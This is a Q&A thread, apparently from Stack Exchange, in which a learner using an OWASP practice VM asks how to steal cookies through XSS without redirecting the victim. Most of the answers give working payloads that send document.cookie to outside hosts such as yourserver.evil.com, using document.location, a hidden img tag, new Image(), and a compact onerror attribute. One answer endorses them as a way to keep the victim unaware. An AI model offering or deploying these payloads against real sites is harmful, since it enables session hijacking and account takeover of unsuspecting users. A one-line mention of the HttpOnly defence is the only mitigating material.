XSS cookie stealing without redirecting to another page

  • I'm practicing in a VM following the OWASP guide. I know that it is possible to steal the cookie by redirecting to a "false" page etc., but I would like to steal the cookie without redirecting to another page.

    So, if you have some guestbook and then you put:

    document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie
    

    How can I put this into existing page without redirecting?

    Basically, what I want is when someone clicks on the link, grab the cookie and print it somewhere on the current page. Maybe in some alt tag or whatever.

    Any ideas?

    Google changed the way cookies are written. I can't get session cookies using the above method.

  • If you have full control of the JavaScript getting written to the page then you could just do

    document.write('cookie: ' + document.cookie)

    If you want it sent to another server, you could include it in a non-existent image:

    document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')

    The key here is whether you can output arbitrary JavaScript or whether you're limited in the kind of JavaScript you can get executed. If you're limited in what can be output, you could use more advanced methods of getting your custom code to execute, which are a bit out of scope of the question.

    And you can even request it without writing to `document`: `image = new Image(); image.src='http://example.com?c='+document.cookie;`

    I cannot edit your post, but there is a missing quote: `/>)` should be `/>')`. Thanks anyway, excellent answer.

    This should not be the case if the cookie is marked with the HttpOnly attribute.

  • To add to Steve's answer, there are many different ways to achieve this. If your intention is for the user not to be aware of the stolen cookie, I would suggest the <img> attack Steve suggested, although I prefer avoiding document.write since it uses up so many characters:

    <img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
    

    This is nice and compact, but the problem is that it will recursively trigger the `onerror` handler unless an image is served from the attacker's page.

    I use this approach, but as the source you can use an existing image and use the `onload` attribute for the payload: `https://github.com/favicon.ico" width="0" height="0">`

License under CC-BY-SA with attribution


Content dated before 6/26/2020 9:53 AM